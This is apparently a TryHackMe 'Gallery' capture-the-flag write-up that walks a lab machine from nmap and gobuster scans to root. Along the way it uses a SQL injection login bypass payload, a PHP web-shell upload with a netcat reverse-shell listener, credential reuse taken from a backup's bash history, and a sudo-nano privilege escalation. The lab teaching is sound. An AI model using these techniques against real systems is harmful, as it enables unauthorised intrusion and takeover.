Nmap

First we scan for open ports

# nmap -p- -T4 -sV -sC 10.10.2.97 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-23 22:38 BST
Nmap scan report for 10.10.2.97
Host is up (0.020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 db:44:3b:8e:2e:73:a6:ed:e6:a1:b6:1b:0d:59:b5:4f (RSA)
|   256 46:f1:a7:aa:c1:e5:e2:b0:c5:46:72:95:46:1b:89:a2 (ECDSA)
|_  256 90:f9:74:d9:ff:e3:a4:e7:1d:3c:c4:31:06:2e:80:0e (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Simple Image Gallery System
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds

Website

Checking the site on port it is just the default apache holding page, so we run a gobuster scan.

# gobuster dir -u http://10.10.2.97 -w /usr/share/wordlists/dirb/common.txt  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.2.97
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/gallery              (Status: 301) [Size: 310] [--> http://10.10.2.97/gallery/]
/index.html           (Status: 200) [Size: 10918]
/server-status        (Status: 403) [Size: 275]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

This reveals the gallery subdirectory. Checking the website on port 8080 results in just getting redirected back to this page too. We find a login page for “Simple Image Gallery System”.

After trying a couple of standard user/pass combinations we find that the login is vulnerable to SQL injection, and with the payload admin' -- - we are able to login. We go into any of the existing albums are upload a php web shell.

This uploads successfully, so we start a listener, click the “image” we uploaded and get a shell back.

# nc -lvnp 6666             
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.2.97] 54434
Linux ip-10-10-2-97 5.15.0-139-generic #149~20.04.1-Ubuntu SMP Wed Apr 16 08:29:56 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
 22:10:40 up 38 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Looking around on the system we find a backup of mike’s home directory are we can read it.

$ ls -lah /var/backups/
total 88K
drwxr-xr-x  3 root root 4.0K Jul 10 17:51 .
drwxr-xr-x 13 root root 4.0K May 20  2021 ..
-rw-r--r--  1 root root  42K Jul 10 17:50 apt.extended_states.0
-rw-r--r--  1 root root 4.5K Jul  5 14:26 apt.extended_states.1.gz
-rw-r--r--  1 root root 4.5K Jul  5 14:12 apt.extended_states.2.gz
-rw-r--r--  1 root root 3.7K Feb 12  2022 apt.extended_states.3.gz
-rw-r--r--  1 root root 3.7K Aug 25  2021 apt.extended_states.4.gz
-rw-r--r--  1 root root 3.5K May 21  2021 apt.extended_states.5.gz
-rw-r--r--  1 root root 3.5K May 20  2021 apt.extended_states.6.gz
drwxr-xr-x  5 root root 4.0K May 24  2021 mike_home_backup
$ ls -lah /var/backups/mike_home_backup
total 36K
drwxr-xr-x 5 root root 4.0K May 24  2021 .
drwxr-xr-x 3 root root 4.0K Jul 10 17:51 ..
-rwxr-xr-x 1 root root  135 May 24  2021 .bash_history
-rwxr-xr-x 1 root root  220 May 24  2021 .bash_logout
-rwxr-xr-x 1 root root 3.7K May 24  2021 .bashrc
drwxr-xr-x 3 root root 4.0K May 24  2021 .gnupg
-rwxr-xr-x 1 root root  807 May 24  2021 .profile
drwxr-xr-x 2 root root 4.0K May 24  2021 documents
drwxr-xr-x 2 root root 4.0K May 24  2021 images
$ cat /var/backups/mike_home_backup/.bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -l*****************
clear
sudo -l
exit

Using these creds we can login as mike and get the user flag.

# ssh mike@10.10.2.97
mike@10.10.2.97's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat 23 Aug 2025 10:34:29 PM UTC

  System load:  0.0               Processes:             119
  Usage of /:   73.6% of 6.79GB   Users logged in:       0
  Memory usage: 14%               IPv4 address for ens5: 10.10.2.97
  Swap usage:   0%

 * Ubuntu Pro delivers the most comprehensive open source security and
   compliance features.

   https://ubuntu.com/aws/pro

Expanded Security Maintenance for Infrastructure is not enabled.

11 updates can be applied immediately.
11 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

36 additional security updates can be applied with ESM Infra.
Learn more about enabling ESM Infra service for Ubuntu 20.04 at
https://ubuntu.com/20-04


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.

Last login: Sat Aug 23 22:34:30 2025 from 10.11.18.78
mike@ip-10-10-2-97:~$ cat user.txt 
THM{af**********************ef}

Privilege escalation

Checking mike’s sudo privileges we see there is an entry.

mike@ip-10-10-2-97:~$ sudo -l
Matching Defaults entries for mike on ip-10-10-2-97:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on ip-10-10-2-97:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

Looking at the script we dont have permissions to modify it.

mike"ip-10-10-2-97:¬$ ls -lah /opt/rootkit.sh 

-rw-r--r-- 1 root root 364 May 20  2021 /opt/rootkit.sh

mike@ip-10-10-2-97:~$ cat /opt/rootkit.sh 
#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

However by choosing the read option, nano would be running with root permissions.

mike@ip-10-10-2-97:~$ sudo bash /opt/rootkit.sh 
Would you like to versioncheck, update, list or read the report ? read

Checking on GTFOBins we see we can exploit this to get a shell and read the root flag.

                                                                                         [ Executing... ]# 
#  Get Help                                                     M-F New Buffer                                                  ^X Read File
#  Cancel                                                       M-\ Pipe Text
# id 
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{ba********************************87}

THM: Gallery

Nmap

Website

Privilege escalation